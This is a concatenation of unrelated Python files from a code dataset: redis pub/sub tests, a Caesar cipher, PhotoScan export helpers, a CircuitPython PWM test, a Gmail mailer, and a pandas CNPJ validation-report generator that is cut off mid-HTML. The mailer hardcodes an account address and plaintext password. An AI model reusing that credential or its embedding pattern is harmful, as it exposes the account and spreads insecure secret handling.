if checkpoint is not None:\n logger.best_result = checkpoint['best_result']\n print(\"=> logger created.\")\n\n if is_eval:\n print(\"=> starting model evaluation ...\")\n iterate(\"test_completion_segmentation\", args, val_loader, model, None, logger,\n checkpoint['epoch'])\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"v3/completion_segmentation_test.py","file_name":"completion_segmentation_test.py","file_ext":"py","file_size_in_byte":9030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"78137732","text":"import redis\nimport unittest\n\nfrom redis.exceptions import ConnectionError\nfrom redis.compat import next\n\nencode = lambda s: s.encode()\n\nclass PubSubTestCase(unittest.TestCase):\n def setUp(self):\n self.connection_pool = redis.ConnectionPool()\n self.client = redis.Redis(connection_pool=self.connection_pool)\n self.pubsub = self.client.pubsub()\n\n def tearDown(self):\n self.connection_pool.disconnect()\n\n def test_channel_subscribe(self):\n self.assertEquals(\n self.pubsub.subscribe('foo'),\n ['subscribe'.encode(), 'foo'.encode(), 1]\n )\n self.assertEquals(self.client.publish('foo', 'hello foo'), 1)\n self.assertEquals(\n next(self.pubsub.listen()),\n {\n 'type': 'message'.encode(),\n 'pattern': None,\n 'channel': 'foo'.encode(),\n 'data': 'hello foo'.encode()\n }\n )\n self.assertEquals(\n self.pubsub.unsubscribe('foo'),\n ['unsubscribe'.encode(), 'foo'.encode(), 0]\n )\n\n def test_pattern_subscribe(self):\n self.assertEquals(\n self.pubsub.psubscribe('fo*'),\n ['psubscribe'.encode(), 'fo*'.encode(), 1]\n )\n self.assertEquals(self.client.publish('foo', 'hello foo'), 1)\n self.assertEquals(\n next(self.pubsub.listen()),\n {\n 'type': 'pmessage'.encode(),\n 'pattern': 'fo*'.encode(),\n 'channel': 'foo'.encode(),\n 'data': 'hello foo'.encode()\n }\n )\n self.assertEquals(\n self.pubsub.punsubscribe('fo*'),\n ['punsubscribe'.encode(), 'fo*'.encode(), 0]\n )\n\nclass PubSubRedisDownTestCase(unittest.TestCase):\n def setUp(self):\n self.connection_pool = redis.ConnectionPool(port=6390)\n self.client = redis.Redis(connection_pool=self.connection_pool)\n self.pubsub = self.client.pubsub()\n\n def tearDown(self):\n self.connection_pool.disconnect()\n\n def test_channel_subscribe(self):\n got_exception = False\n try:\n self.pubsub.subscribe('foo')\n except ConnectionError:\n got_exception = True\n self.assertTrue(got_exception)\n","sub_path":"tests/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"264435103","text":"\nimport math\nchars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' # char alphabet\nmesenger = \"Xin chao cac ban, minh la Trung\".upper() #messenger\nk = 16 # key\nmode = 'encrypt' # mode decrypt\n\n#main program\ndef Cipher():\n translated = ''\n for c in mesenger:\n if c in chars:\n num = chars.find(c)\n if mode == 'encrypt':\n num += k\n elif mode == 'decrypt':\n num -= k\n pos = num % 26;\n translated += chars[pos]\n print(translated)\n\n\nif __name__ == '__main__':\n Cipher()\n\n\n","sub_path":"source/CaesarCipher.py","file_name":"CaesarCipher.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500808062","text":"import PhotoScan\nimport os\n\ndoc = PhotoScan.app.document\n\n\ndef export_obj(export=True):\n for chunk in doc.chunks:\n if export is True:\n ext = \".obj\"\n file = format_file(ext, chunk)\n chunk.exportModel(file)\n\n\ndef get_save():\n path = PhotoScan.app.getSaveFileName(\"Save project as\")\n try:\n doc.save(path)\n\n except RuntimeError:\n PhotoScan.app.messageBox(\"Can't Save Project\")\n\n\ndef check_save():\n if doc.path is not \"\":\n print(\"save exists\")\n else:\n print(\"no save file\")\n get_save()\n\n\ndef align(chunk):\n chunk.matchPhotos(accuracy=PhotoScan.HighAccuracy,\n generic_preselection=True,\n reference_preselection=False,\n keypoint_limit=55000,\n tiepoint_limit=5000\n )\n chunk.alignCameras()\n\n\ndef align_all():\n for chunk in doc.chunks:\n align(chunk)\n doc.save()\n\n\ndef duplicate(chunk):\n name = chunk.label\n new = chunk.copy()\n new.label = \"{}_3D_PDF\".format(name)\n\n\ndef duplicate_all(export=True):\n for chunk in doc.chunks:\n\n # Max\n name = chunk.label\n chunk.label = \"{}_Max\".format(name)\n\n # Rhino\n rhino = chunk.copy()\n rhino.label = \"{}_Rhino\".format(name)\n rhino.decimateModel(1500000)\n rhino.buildUV(mapping=PhotoScan.GenericMapping)\n rhino.buildTexture(blending=PhotoScan.MosaicBlending,\n size=4096)\n if export is True:\n ext = \".obj\"\n file = format_file(ext, rhino)\n rhino.exportModel(file)\n\n # PDF\n pdf = chunk.copy()\n pdf.label = \"{}_3D\".format(name)\n pdf.decimateModel(100000)\n pdf.buildUV(mapping=PhotoScan.GenericMapping)\n pdf.buildTexture(blending=PhotoScan.MosaicBlending,\n size=4096)\n if export is True:\n ext = \".pdf\"\n file = format_file(ext, pdf)\n pdf.exportModel(file)\n doc.save()\n\n\ndef process(chunk):\n chunk.buildDepthMaps(quality=PhotoScan.MediumQuality,\n filter=PhotoScan.AggressiveFiltering)\n chunk.buildDenseCloud()\n chunk.buildModel(surface=PhotoScan.Arbitrary,\n interpolation=PhotoScan.EnabledInterpolation,\n face_count=0)\n chunk.buildUV(mapping=PhotoScan.GenericMapping)\n chunk.buildTexture(blending=PhotoScan.MosaicBlending,\n size=4096)\n doc.save()\n\n\ndef process_all():\n for chunk in doc.chunks:\n process(chunk)\n\n\ndef decimate_pdf(chunk):\n chunk.decimateModel(100000)\n\n\ndef get_folder(chunk):\n pic = chunk.cameras[0].photo.path\n path = os.path.dirname(pic)\n return path\n\n\ndef format_file(ext, chunk):\n path = get_folder(chunk)\n file = \"{}/{}{}\".format(path, chunk.label, ext)\n return file\n\n\ndef main():\n check_save()\n export_obj()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Agisoft/Agi_1_4_0/_Archive/export_objs.py","file_name":"export_objs.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"411008773","text":"# qtpynoisyboi_test.py --\r\n#\r\n# MOSI -- out A (PWM)\r\n# MISO -- out B (PWM)\r\n# A0 -- out C (DAC)\r\n# A1 -- in A\r\n# A2 -- in B\r\n# A3 -- in C\r\n\r\nimport time\r\nimport board\r\n#import neopixel\r\nimport pwmio\r\nimport analogio\r\nimport digitalio\r\nfrom adafruit_debouncer import Debouncer\r\n\r\nbutt1pin = digitalio.DigitalInOut(board.TX)\r\nbutt1pin.pull = digitalio.Pull.UP\r\nbutt1 = Debouncer(butt1pin)\r\n\r\n\r\npotAknob = analogio.AnalogIn(board.A1)\r\n\r\noutA = pwmio.PWMOut(board.MOSI, frequency=25000, duty_cycle=0)\r\noutB = pwmio.PWMOut(board.MISO, frequency=25000, duty_cycle=0)\r\n#outA.duty_cycle = 0\r\noutA.duty_cycle = 32768\r\n#outA.duty_cycle = 65535\r\n\r\n# test: check DC\r\n#while True: time.sleep(0.1); pass\r\n\r\n#cvs = [ 100, 75, 50, 25, 0 ]\r\n#cvs = [ 90, 75, 50, 25, 10,0 ]\r\n#cvs = [ 48, 40, 30, 25 ]\r\nrate = 0.1\r\ncvs_list = [\r\n (90, 75, 50, 25, 10, 0),\r\n (100,0),\r\n ( 48, 40, 30, 25 ),\r\n]\r\ncvsa_index = 0\r\ncvsb_index = 0\r\ncvai=0\r\ncvbi=0\r\ncva_last = time.monotonic()\r\ncvb_last = time.monotonic()\r\n\r\ncvsa = cvs_list[cvsa_index]\r\ncvsb = cvs_list[cvsb_index]\r\n\r\nwhile True:\r\n butt1.update()\r\n now = time.monotonic()\r\n if now > cva_last + rate:\r\n cva_last = now\r\n cvai = (cvai + 1) % len(cvsa)\r\n duty_cycle = int( cvsa[cvai] * 65535/100)\r\n outA.duty_cycle = 65535 - duty_cycle\r\n rate = 0.01 + (potAknob.value / 65535 / 2)\r\n if butt1.fell: # pressed\r\n print(\"push!\")\r\n cvsa_index = (cvsa_index + 1 ) % len(cvs_list)\r\n cvsa = cvs_list[cvsa_index]\r\n \r\n\r\n\r\n\r\n# cv = 50\r\n# while True:\r\n# duty_cycle = int(cv * 65535/100)\r\n# out1.duty_cycle = 65535 - duty_cycle\r\n \r\n# cv_index = 0\r\n# while True:\r\n# if but1.value == False: # pressed\r\n# print(\"push!\")\r\n# cv_index = (cv_index + 1 ) % len(cvs_list)\r\n# cvs = cvs_list[ cv_index ]\r\n \r\n# for cv in cvs:\r\n# duty_cycle = int(cv * 65535/100)\r\n# out1.duty_cycle = 65535 - duty_cycle\r\n# out2.duty_cycle = duty_cycle\r\n# print(\"duty:\",duty_cycle, out1.duty_cycle)\r\n# rate = 0.01 + (potAknob.value / 65535 / 2)\r\n# time.sleep(rate)\r\n \r\n\r\n# # test knob to voltage output\r\n# while True:\r\n# pos = potknob.value // 256\r\n# print(\"pos:\",pos)\r\n# out1.duty_cycle = 65535 - potknob.value # inverting amplifier\r\n# time.sleep(0.01)\r\n\r\n\r\n# # test simple triangle wave output\r\n# i=0\r\n# while True:\r\n# if i < 50:\r\n# out1.duty_cycle = int(i * 2 * 65535 / 100) # Up\r\n# else:\r\n# out1.duty_cycle = 65535 - int((i - 50) * 2 * 65535 / 100) # Down\r\n# i = (i + 1) % 100\r\n# time.sleep(0.001)\r\n \r\n# while True:\r\n# for i in range(100):\r\n# if i < 50:\r\n# led.duty_cycle = int(i * 2 * 65535 / 100) # Up\r\n# else:\r\n# out1.duty_cycle = 65535 - int((i - 50) * 2 * 65535 / 100) # Down\r\n# # time.sleep(0.0001)\r\n\r\n \r\n","sub_path":"firmware/circuitpython/tests/qtpynoisyboi_test2.py","file_name":"qtpynoisyboi_test2.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"389119397","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/mad/Documents/spike/spike/util/mail.py\n# Compiled at: 2019-01-16 17:28:48\n# Size of source mod 2**32: 2435 bytes\nfrom __future__ import print_function\nimport smtplib, sys\nif sys.version_info[0] < 3:\n import email.MIMEMultipart as MIMEMultipart\n import email.MIMEBase as MIMEBase\n import email.MIMEText as MIMEText\n from email import Encoders\nelse:\n from email import encoders as Encoders\n from email.mime.base import MIMEBase\n from email.mime.text import MIMEText\n from email.mime.multipart import MIMEMultipart\nimport os.path as op\nimport unittest\n\nclass GMAIL(object):\n __doc__ = '\\n Class for sending mails with Gmail with smtp protocol.\\n input:\\n gmail_user : name of the Gmail account\\n gmail_pwd : password of the Gmail account\\n to: destination of the mail\\n subject: subject of the mail\\n text: text to be sent\\n attach: Attached document\\n Usage: \\n gm = GMAIL()\\n gm.send(to = \\'gmalert67@gmail.com\\', subject = \\'test gmail\\', text = \"hello\", attach = None)\\n '\n\n def __init__(self, gmail_user='gmalert67@gmail.com', gmail_pwd='igbmcalert'):\n self.gmail_user = gmail_user\n self.gmail_pwd = gmail_pwd\n\n def send(self, to, subject, text='', attach=None):\n self.to = to\n self.subject = subject\n self.text = text\n self.attach = attach\n msg = MIMEMultipart()\n msg['From'] = self.gmail_user\n msg['To'] = self.to\n msg['Subject'] = self.subject\n if text != '':\n msg.attach(MIMEText(self.text))\n if attach != None:\n part = MIMEBase('application', 'octet-stream')\n part.set_payload(open(self.attach, 'rb').read())\n Encoders.encode_base64(part)\n part.add_header('Content-Disposition', 'attachment; filename = \"%s\"' % op.basename(self.attach))\n msg.attach(part)\n mailServer = smtplib.SMTP('smtp.gmail.com', 587)\n mailServer.ehlo()\n mailServer.starttls()\n mailServer.ehlo()\n mailServer.login(self.gmail_user, self.gmail_pwd)\n mailServer.sendmail(self.gmail_user, self.to, msg.as_string())\n mailServer.close()\n\n\nclass Test(unittest.TestCase):\n gm = GMAIL()\n gm.send(to='gmalert67@gmail.com', subject='test gmail', text='hello', attach=None)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pycfiles/spike_py-0.99.15.tar/mail.cpython-37.py","file_name":"mail.cpython-37.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"395666041","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom plotly.offline import iplot\nimport plotly.graph_objs as go\nfrom plotly.subplots import make_subplots\n\n\n#Define as funções personalizadas necessárias\ndef write_to_html_file(df, title='', filename='out.html'):\n result = '''\n\n\n\n\n\n '''\n result += '

%s

\\n' % title\n if type(df) == pd.io.formats.style.Styler:\n result += df.render()\n else:\n result += df.to_html(classes='wide', escape=False)\n result += '''\n\n\n'''\n with open(filename, 'w') as f:\n f.write(result)\n\ndef highlight_max(s): \n is_max = s == s.max()\n return ['color: white; background-color: #3749E9' if v else '' for v in is_max]\n\ndef highlight_min(s):\n is_max = s == s.min()\n return ['color: white; background-color: #112244' if v else '' for v in is_max]\n\ndef destaque(val):\n color = '#F2F200' if val == 'Sim' else ''\n return 'background: {}'.format(color)\n\ndef destaque_coluna(val):\n color = '#F2F200' if val == 0 else ''\n return 'background: {}'.format(color)\n\n\ndef validacao (relatorio, pasta, tabela_fnt):\n print (\"Gerando Relatório de Validação da Tabela STG_FNT_ITT...\")\n\n # In[4]:\n \n\n #dataframe do o arquivo .xlsx\n\n df = pd.read_excel(tabela_fnt)\n\n\n # In[5]:\n\n\n #df\n\n\n # # Valida os tipos das colunas\n\n # In[6]:\n\n\n #df.dtypes\n\n\n # In[7]:\n\n\n #Trata as datas\n df.DAT_INC_DBO = pd.to_datetime(df.DAT_INC_DBO, format='%Y-%m-%d', errors='coerce')\n\n #Verifica as linhas das colunas o tipo desejado\n dict_tipo = {'ID_STG_FNT_ITT': int, 'NUM_CNPJ': int, 'NUM_CMP_CNPJ': int, 'NOM_COM': str,\n 'NOM_RAZ_SCL': str, 'DAT_INC_DBO': datetime.date}\n dict_analise = {}\n for coluna, tipo in dict_tipo.items():\n dict_analise[coluna] = len([linha for linha in df[coluna]\n if (type(linha) == tipo) or (linha == tipo) or (isinstance(linha, tipo))])\n \n #Calcula a porcentagem do preenchimento por coluna\n final = [x * 100 / len (df) for x in dict_analise.values()]\n\n #Cria um dataframe\n tipo_review = pd.DataFrame({'Porcentagem': final},\n index=df.columns)\n tipo_review = tipo_review.rename_axis('Colunas', axis='columns')\n #tipo_review\n\n\n # In[8]:\n\n\n #Plota em formato gráfico e exporta para HTML\n data = [go.Bar(y=final,\n x=df.columns,\n marker=dict(color='#112244')\n )]\n\n fig = go.Figure(data=data)\n fig.update_xaxes(showline=True, linewidth=1, linecolor='#717171')\n fig.update_yaxes(showgrid=True, gridwidth=1, gridcolor='#D9D9DE')\n fig.update_layout(dict(plot_bgcolor = '#FFFFFF', paper_bgcolor = '#FFFFFF'))\n fig.update_layout(yaxis=dict(ticksuffix = '%'))\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_tipo.html\")\n\n\n # # Define as colunas com dados sensíveis\n\n # In[9]:\n\n\n #Cria um dataframe definido as colunas com dados sensíveis\n dado_sensivel = ['Sim', 'Sim', 'Sim', 'Sim', 'Sim', 'Não']\n\n sensibilidade_review = pd.DataFrame({'Dado Sensível': dado_sensivel},\n index=df.columns)\n sensibilidade_review = sensibilidade_review.rename_axis('Colunas', axis='columns')\n\n visualiza = (sensibilidade_review\n .style\n .applymap(destaque))\n write_to_html_file(visualiza, title='', filename=pasta + \"/fnt_tab_sensibilidade.html\")\n visualiza\n\n\n # # Analisando os campos duplicados\n\n # In[10]:\n\n\n #Analisa o número de valores únicos e que não foram duplicados\n unico = [len(np.unique(df.ID_STG_FNT_ITT)) * 100 / len (df)]\n ff = df[['NUM_CNPJ', 'NUM_CNPJ', 'NUM_CMP_CNPJ', 'NOM_COM', 'DAT_INC_DBO']]\n\n for x in ff.columns:\n coluna = df\n coluna = coluna.replace(0,np.nan)\n soma = coluna.groupby(f'{x}').count()\n soma = soma[soma.ID_STG_FNT_ITT == 1]\n soma = soma.ID_STG_FNT_ITT.sum()\n unico.append (soma * 100 / len (coluna[x]))\n\n #Cria um dataframe\n unico_review = pd.DataFrame({'Campos Não Duplicados': unico},\n index=df.columns)\n unico_review = unico_review.rename_axis('Colunas', axis='columns')\n #unico_review\n\n\n # In[11]:\n\n\n #Plota em gráfico de barras horizontal\n data = go.Bar(x = unico, \n y = df.columns, \n orientation = 'h', \n marker = {'color' : '#00B7CC'})\n\n layout = go.Layout(title = '', \n yaxis = {'title': ''}, \n xaxis = {'title': ''})\n\n fig = go.Figure(data = data, layout = layout)\n fig.update_yaxes(showline = True, linewidth = 1, linecolor = '#717171')\n fig.update_xaxes(showgrid = True, gridwidth = 1, gridcolor = '#D9D9DE')\n fig.update_layout({'plot_bgcolor': '#FFFFFF', 'paper_bgcolor': '#FFFFFF'})\n fig.update_layout(xaxis=dict(ticksuffix = '%'))\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_unicos.html\")\n\n\n # # Verifica a completude da tabela\n\n # In[12]:\n\n\n #Completa espaços vaszios com zero\n df = df.fillna(0)\n\n #Converte as colunas para os valores corretos\n df.ID_STG_FNT_ITT = df.ID_STG_FNT_ITT.astype(np.int64)\n df.NUM_CNPJ = df.NUM_CNPJ.astype(np.int64)\n df.NUM_CMP_CNPJ = df.NUM_CMP_CNPJ.astype(np.int64)\n df.NOM_COM = df.NOM_COM.astype (str)\n df.NOM_RAZ_SCL = df.NOM_RAZ_SCL.astype (str)\n #df.dtypes\n\n\n # In[13]:\n\n\n #Calcula o número de linhas completas por coluna\n coluna_id = len([x for x in df.ID_STG_FNT_ITT if x != 0]) * 100 / len (df.ID_STG_FNT_ITT)\n coluna_num_cnpj = len([x for x in df.NUM_CNPJ if x != 0]) * 100 / len (df.NUM_CNPJ)\n coluna_num_comp = len([x for x in df.NUM_CMP_CNPJ if x != 0]) * 100 / len (df.NUM_CMP_CNPJ)\n coluna_nome_com = len([x for x in df.NOM_COM if x != 0]) * 100 / len (df.NOM_COM)\n coluna_nome_raz = len([x for x in df.NOM_RAZ_SCL if x != 0]) * 100 / len (df.NOM_RAZ_SCL)\n coluna_data_inc = len([x for x in df.DAT_INC_DBO if x != 0]) * 100 / len (df.DAT_INC_DBO)\n\n campos_validos = [coluna_id, coluna_num_cnpj, coluna_num_comp, coluna_nome_com, coluna_nome_raz, coluna_data_inc]\n\n #Define um conjunto de rótulos para o index\n preenchimento_labels = ['ID_STG_FNT_ITT', 'NUM_CNPJ', \n 'NUM_CMP_CNPJ', 'NOM_COM', \n 'NOM_RAZ_SCL', 'DAT_INC_DBO']\n\n #Cria uma nova tabela com todos os dados obtidos\n tabela_review = pd.DataFrame({'Campos Válidos': campos_validos},\n index=preenchimento_labels)\n tabela_review = tabela_review.rename_axis('Colunas', axis='columns')\n #tabela_review\n\n\n # In[14]:\n\n\n #Plota em gráfico de barras horizontal\n data = go.Bar(x = campos_validos, \n y = preenchimento_labels, \n orientation = 'h', \n marker = {'color' : '#3749E9'})\n\n layout = go.Layout(title = '', \n yaxis = {'title': ''}, \n xaxis = {'title': ''})\n\n fig = go.Figure(data = data, layout = layout)\n fig.update_yaxes(showline = True, linewidth = 1, linecolor = '#717171')\n fig.update_xaxes(showgrid = True, gridwidth = 1, gridcolor = '#D9D9DE')\n fig.update_layout({'plot_bgcolor': '#FFFFFF', 'paper_bgcolor': '#FFFFFF'})\n fig.update_layout(xaxis=dict(ticksuffix = '%'))\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_preenchimento.html\")\n\n\n # In[15]:\n\n\n #Separa por grupos os valores diferentes encontrados nas colunas de datas\n datas_inc = df[df['DAT_INC_DBO'] != 0]\n datas_inc = datas_inc.groupby('DAT_INC_DBO').count()\n datas_inc\n\n #Analisa os valores únicos encontrados e calcula a porcentagem de seu tamanho com o número de linhas da tabela\n conta = 0\n porcentagem = []\n for x in datas_inc.ID_STG_FNT_ITT:\n conta = x * 100 / len(df)\n porcentagem.append (conta)\n\n #Cria um dataframe\n datas_encontradas = pd.DataFrame({'Porcentagem': porcentagem},\n index=datas_inc.index)\n datas_encontradas = datas_encontradas.rename_axis('Datas Encontradas', axis='columns')\n datas_encontradas.index.name = None\n\n visualiza = (datas_encontradas\n .style\n .format({'Porcentagem':\"{:.2f}%\"})\n .applymap(destaque_coluna, subset=pd.IndexSlice[:, ['Porcentagem']]))\n write_to_html_file(visualiza, title='', filename=pasta + \"/fnt_tab_datas.html\")\n visualiza\n\n\n # # Analisa os CNPJs válidos desconsiderado linhas nulas, cnpjs inválidos e nomes idênticos\n\n # In[16]:\n\n\n #Agrupa por nomes idênticos\n nome_identico = df.groupby('NOM_RAZ_SCL').count().sort_values(by = 'NUM_CNPJ', ascending = False)\n\n #Depreza os nomes idênticos\n nome_identico = nome_identico[nome_identico['ID_STG_FNT_ITT'] > 1]\n\n #Adiciona a listas os CNPJs por nomes idênticos ou únicos\n cnpj_nome_identico = [df.NUM_CNPJ[x] for x in range (len (df)) if df.NOM_RAZ_SCL[x] in nome_identico.index]\n cnpj_c_nome_identico = [df.NUM_CMP_CNPJ[x] for x in range (len (df)) if df.NOM_RAZ_SCL[x] in nome_identico.index]\n cnpj_nome_unico = [df.NUM_CNPJ[x] for x in range (len (df)) if df.NOM_RAZ_SCL[x] not in nome_identico.index]\n cnpj_c_nome_unico = [df.NUM_CMP_CNPJ[x] for x in range (len (df)) if df.NOM_RAZ_SCL[x] not in nome_identico.index]\n\n\n # In[17]:\n\n\n #Analisa apenas os CNPJs cuja a linha da coluna NUM_CNPJ possui valor único\n cnpjList_nome_unico = [str(cnpj_nome_unico[c]) + str(cnpj_c_nome_unico[c]) for c in range (len(cnpj_nome_unico))]\n\n #Verifica o tamanho do CNPJ e adiciona a listas de validos ou inválidos, com mais ou com menos de 14 caracteres\n cnpj_valido_nome_unico = [cnpjList_nome_unico[c] for c in range (len(cnpjList_nome_unico)) if len(cnpjList_nome_unico[c]) == 14]\n cnpj_nao_valido = [cnpjList_nome_unico[c] for c in range (len(cnpjList_nome_unico)) if len(cnpjList_nome_unico[c]) != 14]\n cnpj_mais = [cnpjList_nome_unico[c] for c in range (len(cnpjList_nome_unico)) if len(cnpjList_nome_unico[c]) > 14]\n cnpj_menos = [cnpjList_nome_unico[c] for c in range (len(cnpjList_nome_unico)) if len(cnpjList_nome_unico[c]) < 14]\n\n #Analisa apenas os CNPJs cuja a linha da coluna NUM_CNPJ possui valores idênticos\n cnpjList_nome_identico = [str(cnpj_nome_identico[c]) + str(cnpj_c_nome_identico[c]) for c in range (len(cnpj_nome_identico))]\n\n #Verifica o tamanho do CNPJ e adiciona a listas de validos ou inválidos, com mais ou com menos de 14 caracteres\n cnpj_valido_nome_identico = [cnpjList_nome_identico[c] for c in range (len(cnpjList_nome_identico)) if len(cnpjList_nome_identico[c]) == 14]\n cnpj_nao_valido.extend([(cnpjList_nome_identico[c]) for c in range (len(cnpjList_nome_identico)) if len(cnpjList_nome_identico[c]) != 14])\n cnpj_mais.extend([(cnpjList_nome_identico[c]) for c in range (len(cnpjList_nome_identico)) if len(cnpjList_nome_identico[c]) > 14])\n cnpj_menos.extend([(cnpjList_nome_identico[c]) for c in range (len(cnpjList_nome_identico)) if len(cnpjList_nome_identico[c]) < 14])\n\n #len(cnpjList_nome_unico), len(cnpjList_nome_identico), len(cnpj_valido_nome_unico), len(cnpj_valido_nome_identico), \\\n #len(cnpj_nao_valido), len(cnpj_mais), len(cnpj_menos)\n\n\n # # Gráfico dos CNPJs Únicos\n\n # In[18]:\n\n\n #Plota em gráfico de setores\n cnpjs_unicos = len(np.unique(cnpj_valido_nome_unico)) + len(np.unique(cnpj_valido_nome_identico))\n cnpjs_identicos = len(cnpj_valido_nome_unico) + len(cnpj_valido_nome_identico) - cnpjs_unicos\n\n valores_unicos = cnpjs_unicos*100/(len(cnpj_valido_nome_unico) + len(cnpj_valido_nome_identico))\n valores_identicos = 100 - valores_unicos\n\n labels = ['CNJPs Validados Únicos', 'CNJPs Validados Idênticos']\n colors = ['#3749e9', '#112244']\n sizes = [valores_unicos, valores_identicos]\n explode = (0, 0.05)\n\n fig = go.Figure(data=[go.Pie(labels=labels, values=sizes)])\n fig.update_traces(marker=dict(colors=colors, line=dict(color='#000000', width=0)))\n fig.update_traces(texttemplate='%{percent:.2%f}')\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_cnpjs_unicos.html\")\n\n\n # # Gráfico de todos os CNPJs válidos desconsiderado linhas nulas, cnpjs inválidos e nomes idênticos\n\n # In[19]:\n\n\n #Plota em gráfico de setores\n cnpjs_unicos = len(np.unique(cnpj_valido_nome_unico))\n cnpjs_identicos = len(cnpj_valido_nome_unico) - cnpjs_unicos\n\n #CNPJs válidos\n conta = cnpjs_unicos\n valores_validos_unicos = (conta*100) / len(df)\n\n #CNPJs descartados, mas válidos\n conta = len(cnpj_valido_nome_identico) + cnpjs_identicos\n valores_validos_identicos = (conta*100) / len(df)\n\n #CNPJs não válidos\n conta = len(cnpj_nao_valido)\n valores_nao_validos = (conta*100) / len(df)\n\n labels = 'Válidos', 'Invalidados', 'Não válidos'\n colors = ['#00B7CC', '#3749e9', '#112244']\n sizes = [valores_validos_unicos, valores_validos_identicos, valores_nao_validos]\n explode = (0, 0.05, 0.05)\n\n fig = go.Figure(data=[go.Pie(labels=labels, values=sizes)])\n fig.update_traces(marker=dict(colors=colors, line=dict(color='#000000', width=0)))\n fig.update_traces(texttemplate='%{percent:.2%f}')\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_cnpjs_validos.html\")\n\n\n # # Gráfico de todos os CNPJs por número de carácteres\n\n # In[20]:\n\n\n #Plota em gráfico de setores\n # =14 Char\n exat_14_char = valores_validos_unicos + valores_validos_identicos\n\n # +14 Char\n conta = len(cnpj_mais)\n mais_14_char = (conta*100) / len (df)\n\n # -14 Char\n conta = len(cnpj_menos)\n menos_14_char = (conta*100) / len (df)\n\n labels = '+14 Caracteres', '-14 Caracteres', '14 Caracteres (Correto)'\n colors = ['#3749e9', '#112244', '#00B7CC']\n sizes = [mais_14_char, menos_14_char, exat_14_char]\n explode = (0.03, 0.03, 0.03)\n\n fig = go.Figure(data=[go.Pie(labels=labels, values=sizes)])\n fig.update_traces(marker=dict(colors=colors, line=dict(color='#000000', width=0)))\n fig.update_traces(texttemplate='%{percent:.2%f}')\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_cnpjs_caracteres.html\")\n\n\n # # Gráfico de Nomes Únicos\n\n # In[21]:\n\n\n #Plota em gráfico de setores\n nome_identico = nome_identico.ID_STG_FNT_ITT.sum()*100/len(df)\n nome_unico = 100 - nome_identico\n\n labels = ['Nomes Únicos', 'Nomes Idênticos']\n colors = ['#3749e9', '#112244']\n sizes = [nome_unico, nome_identico]\n explode = (0, 0.05)\n\n fig = go.Figure(data=[go.Pie(labels=labels, values=sizes)])\n fig.update_traces(marker=dict(colors=colors, line=dict(color='#000000', width=0)))\n fig.update_traces(texttemplate='%{percent:.2%f}')\n #iplot(fig)\n fig.write_html(pasta + \"/fnt_nomes_unicos.html\")\n\n\n # # Indicadores de Validação\n\n # In[22]:\n\n\n #Calcula a média de preenchimento da remessa\n media_preenchimento = sum (campos_validos) / df.shape[1]\n\n #Calcula de validação\n media_validacao = valores_validos_unicos\n\n #media_preenchimento, media_validacao\n\n html_string = '''\n\n\n\n \n \n METAlitcs - STG_FNT_ITT\n \n \n\n\n\n
\n
\n
\n

METAlitcs

\n
\n
\n
\n

Validação das Tabelas

\n
\n
\n

STG_FNT_ITT

\n
\n
\n
\n\n
\n
\n
\n
\n

Validação das Tabelas

\n
\n \n
\n

STG_FNT_ITT

\n
\n
\n \n
\n

STG_MVT_CRD

\n
\n
\n \n
\n

STG_OPR_ITT

\n
\n
\n \n
\n

STG_PGT

\n
\n
\n\n
\n

Resultados da Remessa

\n
\n \n
\n

Movimentações

\n
\n
\n \n
\n

Operações

\n
\n
\n \n
\n

Pagamentos

\n
\n
\n\n
\n

Índice de Pagamentos
em Dia

\n
\n \n
\n

Por Modalidades

\n
\n
\n
\n

Índice de Número de Pagamentos por Clientes

\n
\n \n
\n

Por Faixas de Valores

\n
\n
\n
\n
\n\n
\n
\n
\n
\n \n
\n
Validade da Tabela
\n
\n
\n
''' + str(int(media_validacao)) + '''%
\n
\n \n
\n
\n \n
\n
Média de Preenchimento da Tabela
\n
\n
\n
''' + str(int(media_preenchimento)) + '''%
\n
\n \n
\n
\n \n
\n
Verificação de Campos Não Nulos
\n
Porcentagem de campos preenchidos por colunas
\n
\n
\n \n
\n \n
\n
\n \n
\n
Datas Encontradas
\n
Porcentagem de campos preenchidos nas colunas DAT_INC_DBO e DAT_RSS_FNT_ITT
\n
\n
\n \n
\n \n
\n
\n\n
\n
\n \n
\n
Validação dos Tipos de Dados
\n
Porcentagem de campos preenchidos por colunas
\n
\n
\n \n
\n \n
\n
\n \n
\n
Definição das Colunas com Dados Sensíveis
\n
Porcentagem de campos preenchidos por colunas
\n
\n
\n \n
\n \n
\n
\n \n
\n
Validação de Dados idênticos
\n
Porcentagem de campos preenchidos por colunas
\n
\n
\n \n
\n \n
\n
\n \n
\n
Validade Geral da Tabela
\n
Porcentagem de campos de CNPJs váidos (somente linhas com Razões Sociais \n Únicas), invalidados (inclui CNPJs válidos, mas em linhas com Razões Sociais Idênticas) e não\n válidos (CNPJs com mais ou menos de 14 caracteres)
\n
\n
\n \n
\n \n
\n
